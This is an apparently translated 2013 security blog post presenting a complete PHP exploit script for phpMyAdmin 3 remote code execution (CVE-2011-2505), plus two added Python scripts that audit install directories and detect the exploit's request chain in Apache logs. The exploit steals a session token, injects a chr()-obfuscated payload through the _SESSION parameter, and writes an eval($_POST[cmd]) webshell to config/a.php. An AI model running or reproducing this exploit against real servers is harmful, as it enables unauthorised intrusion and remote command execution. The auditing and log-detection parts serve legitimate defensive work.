phpMyAdmin3 remote code execute, PHP-version exploit

Posted on 2013-2-21 09:13:03
Lately I have been a full-time dad at home, out of touch with the scene for many months, and the blog has not been updated either.

Last night, up all night with the kid, I saw Heige (黑哥) discussing the phpMyAdmin 3 vulnerability in the PHP security group. I had not read the vulnerable code before, but a while ago I had seen wofeiwo's exp on Weibo, and according to Heige there was a way to exploit it that is not "jilei" (chicken ribs, i.e. not nearly useless). So during the night I dug the code out and studied it and wrote this reheated exp. Since I got to it late, many people had already researched it and written exps, so mine is just reheating leftovers; think of it as research to pass the time.

First, props to wofeiwo's Python version of the exp, and to the research spirit of wofeiwo and superhei, role models to learn from. That earlier exp, however, had some limitations when used:

First, it required session.auto_start = 1;

Second, in the default pma3 code the libraries directory is already protected by .htaccess and cannot be accessed.

And of course there is a third point, a gap nobody can get past: the config directory must exist and be writable.

After reading Heige's remarks in the group and looking at the code again, I found that the first two limitations can both be ignored. So this vulnerability really doesn't have to be that "jilei".
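The three conditions above boil down to deployment state on the server, which is something a defender can audit locally. The following script is an added example (not oldjun's code and not part of phpMyAdmin); it walks a phpMyAdmin 3 document root and reports the conditions the post names: a writable config/ directory, a still-deployed setup/ directory, and a missing libraries/.htaccess. The directory names come from the post; the severity labels and the demo tree built by build_demo_tree() are my own constructed assumptions.

```python
"""Audit a phpMyAdmin 3 install tree for the conditions the post above relies on (added example)."""
import os
import tempfile

# Paths named in the post: config/ must be writable, setup/config.php does the writing,
# and libraries/.htaccess is the deny rule that ships with pma3.
CONFIG_DIR = "config"
SETUP_DIR = "setup"
LIBRARIES_HTACCESS = os.path.join("libraries", ".htaccess")


def audit_pma_tree(root):
    """Return (severity, finding) tuples for a phpMyAdmin document root.

    Run it as the same user PHP runs as: os.access() answers for the calling
    user, not for the web server account.
    """
    findings = []
    config_dir = os.path.join(root, CONFIG_DIR)
    if os.path.isdir(config_dir):
        if os.access(config_dir, os.W_OK):
            findings.append(("high", "config/ exists and is writable; delete it once setup is finished"))
        else:
            findings.append(("medium", "config/ exists (not writable); delete it anyway"))
    if os.path.isdir(os.path.join(root, SETUP_DIR)):
        findings.append(("medium", "setup/ is still deployed; remove it or deny access to it"))
    libraries = os.path.join(root, "libraries")
    if os.path.isdir(libraries) and not os.path.isfile(os.path.join(root, LIBRARIES_HTACCESS)):
        findings.append(("low", "libraries/.htaccess is missing; direct access to libraries/ is not blocked"))
    # A world-writable config.inc.php is the same problem in a different place.
    cfg = os.path.join(root, "config.inc.php")
    if os.path.isfile(cfg) and os.stat(cfg).st_mode & 0o002:
        findings.append(("high", "config.inc.php is world-writable"))
    return findings


def build_demo_tree(hardened=False):
    """Build a throw-away tree shaped like a pma3 unpack (constructed demo data, not a real install)."""
    root = tempfile.mkdtemp(prefix="pma3-audit-")
    os.makedirs(os.path.join(root, "libraries"))
    with open(os.path.join(root, LIBRARIES_HTACCESS), "w") as fh:
        fh.write("Deny from all\n")  # the shipped rule the post mentions
    cfg = os.path.join(root, "config.inc.php")
    with open(cfg, "w") as fh:
        fh.write("<?php\n")
    os.chmod(cfg, 0o644)
    if not hardened:
        # Fresh unpack: the installer directories are still there and writable.
        os.makedirs(os.path.join(root, CONFIG_DIR))
        os.makedirs(os.path.join(root, SETUP_DIR))
    return root


if __name__ == "__main__":
    for label, hardened in (("fresh unpack", False), ("hardened", True)):
        root = build_demo_tree(hardened)
        print(f"[{label}] {root}")
        for sev, msg in audit_pma_tree(root) or [("ok", "no findings")]:
            print(f"  {sev:6} {msg}")
```

Point it at the real document root with audit_pma_tree("/var/www/pma") after deployment; the fix for every "high" finding here is simply to delete config/ and setup/ once config.inc.php has been written.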
So I wrote this PHP version of the exp; the code is as follows:

#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
by oldjun(www.oldjun.com)
welcome to www.t00ls.net
mail: oldjun@gmail.com
Assigned CVE id: CVE-2011-2505
+---------------------------------------------------------------------------+
');

/**
 * working when the directory:"config" exists and is writeable.
 **/

if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host:      target server (ip/hostname)
path:      path to pma3
Example:
php '.$argv[0].' localhost /pma/
+---------------------------------------------------------------------------+
');
    exit;
}

$host = $argv[1];
$path = $argv[2];

/**
 * Try to determine if the directory:"config" exists
 **/
echo "[+] Try to determine if the directory:config exists....\n";
$returnstr=php_request('config/');
if(strpos($returnstr,'404')){
    exit("[-] Exploit Failed! The directory:config does not exist!\n");
}

/**
 * Try to get token and sessionid
 **/
echo "[+] Try to get token and sessionid....\n";
$result=php_request('index.php');
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
$token=$resp[3];
$sessionid=$resp[1];
if($token && $sessionid){
    echo "[+] token: $token\n";
    echo "[+] Session ID: $sessionid\n";
}else{
    exit("[-] Can't get token and Session ID, Exploit Failed!\n");
}

/**
 * Try to insert shell into session
 **/
echo "[+] Try to insert shell into session....\n";
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid); // Actually, almost all the PHP files in the pma3 home directory can be used here.

/**
 * Try to create webshell
 **/
echo "[+] Try to create webshell....\n";
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);

/**
 * Try to check if the webshell was created successfully
 **/
echo "[+] Try to check if the webshell was created successfully....\n";
$content=php_request('config/config.inc.php');
if(strpos($content,'t00ls')){
    echo "[+] Congratulations! Exploit successful....\n";
    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
}else{
    exit("[-] Exploit Failed! Perhaps the directory:config does not exist or is not writeable!\n");
}

/**
 * Minimal raw HTTP/1.1 client: GET when $data is empty, POST otherwise.
 **/
function php_request($url,$data='',$cookie=''){
    global  $host, $path;

    $method=$data?'POST':'GET';

    $packet = $method." ".$path.$url." HTTP/1.1\r\n";
    $packet .= "Accept: */*\r\n";
    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $packet .= "Host: $host\r\n";
    $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
    $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
    $packet .= $cookie?"Cookie: $cookie\r\n":"";
    $packet .= "Connection: Close\r\n\r\n";
    $packet .= $data?$data:"";

    $fp = fsockopen(gethostbyname($host), 80);
    if (!$fp) {
        echo 'No response from '.$host; die;
    }
    fputs($fp, $packet);

    $resp = '';

    // Read until the server closes the connection (Connection: Close above).
    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    fclose($fp);
    return $resp;
}

?>
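Seen from the web server, the exp above is a short, distinctive request chain: a GET carrying session_to_unset together with a _SESSION[...] query key, a POST to setup/config.php, and then a GET of config/config.inc.php that answers 200. The script below is an added detection example (not oldjun's code and not part of phpMyAdmin) that reads Apache combined-format log lines, assigns each request to one of those stages and flags a client only when it both injects a session variable and saves the setup form, so a lone admin POST to setup/config.php is reported for review rather than as an attack. The log lines are constructed for the demo, with the chr() payload abbreviated to PAYLOAD; the combined log format and the stage names are my assumptions.

```python
"""Spot the request chain of the pma3 exploit above in Apache access logs (added example)."""
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit

# Apache combined log line: client ip, timestamp, request line, status (assumed format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Observable stages, named after the requests the exploit sends.
STAGE_SESSION_INJECT = "session_inject"  # ?session_to_unset=...&_SESSION[...]=...
STAGE_SETUP_SAVE = "setup_save"          # POST setup/config.php (writes config/config.inc.php)
STAGE_CONFIG_READ = "config_read"        # GET config/config.inc.php answered with 200

# Constructed sample log lines (not taken from the original post); payload abbreviated.
SAMPLE_LOG = """\
203.0.113.7 - - [21/Feb/2013:09:13:03 +0800] "GET /pma/config/ HTTP/1.1" 403 212 "-" "Mozilla/4.0"
203.0.113.7 - - [21/Feb/2013:09:13:04 +0800] "GET /pma/index.php HTTP/1.1" 200 5123 "-" "Mozilla/4.0"
203.0.113.7 - - [21/Feb/2013:09:13:05 +0800] "GET /pma/db_create.php?token=0123&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/PAYLOAD/*][host]=t00ls.net HTTP/1.1" 200 312 "-" "Mozilla/4.0"
203.0.113.7 - - [21/Feb/2013:09:13:06 +0800] "POST /pma/setup/config.php HTTP/1.1" 200 0 "-" "Mozilla/4.0"
203.0.113.7 - - [21/Feb/2013:09:13:07 +0800] "GET /pma/config/config.inc.php HTTP/1.1" 200 54 "-" "Mozilla/4.0"
198.51.100.20 - - [21/Feb/2013:09:20:00 +0800] "GET /pma/index.php?token=abcd HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.20 - - [21/Feb/2013:09:20:05 +0800] "POST /pma/setup/config.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""


def classify_request(method, target, status):
    """Map one request to a stage of the chain, or None when it matches nothing."""
    parts = urlsplit(target)
    path = parts.path.lower()
    # Split on '&' by hand: the injected key contains ';', which older parse_qsl() treats as a separator.
    keys = [unquote(p.partition("=")[0]) for p in parts.query.split("&") if p]
    if any(k == "session_to_unset" or k.startswith("_SESSION[") for k in keys):
        return STAGE_SESSION_INJECT
    if method == "POST" and path.endswith("/setup/config.php"):
        return STAGE_SETUP_SAVE
    if method == "GET" and path.endswith("/config/config.inc.php") and status == 200:
        return STAGE_CONFIG_READ
    return None


def detect_chain(log_text):
    """Group staged requests per client; mark clients that inject a session and then save setup."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        stage = classify_request(m["method"], m["target"], int(m["status"]))
        if stage:
            events[m["ip"]].append((m["ts"], stage))
    report = {}
    for ip, evs in events.items():
        seen = {stage for _, stage in evs}
        report[ip] = {
            "stages": sorted(seen),
            "likely_exploit": STAGE_SESSION_INJECT in seen and STAGE_SETUP_SAVE in seen,
            "events": evs,
        }
    return report


if __name__ == "__main__":
    for ip, info in detect_chain(SAMPLE_LOG).items():
        flag = "LIKELY EXPLOIT" if info["likely_exploit"] else "review"
        print(f"{ip:15} {flag:15} stages={','.join(info['stages'])}")
```

The session_inject stage alone is already a strong signal, since no legitimate phpMyAdmin page sends a _SESSION[...] query key; the correlation with setup_save mainly serves to separate a completed attack from a scanner probing for the bug. A WAF or log-pipeline rule for the same thing would simply match session_to_unset and _SESSION%5B (or the raw bracket) in the query string.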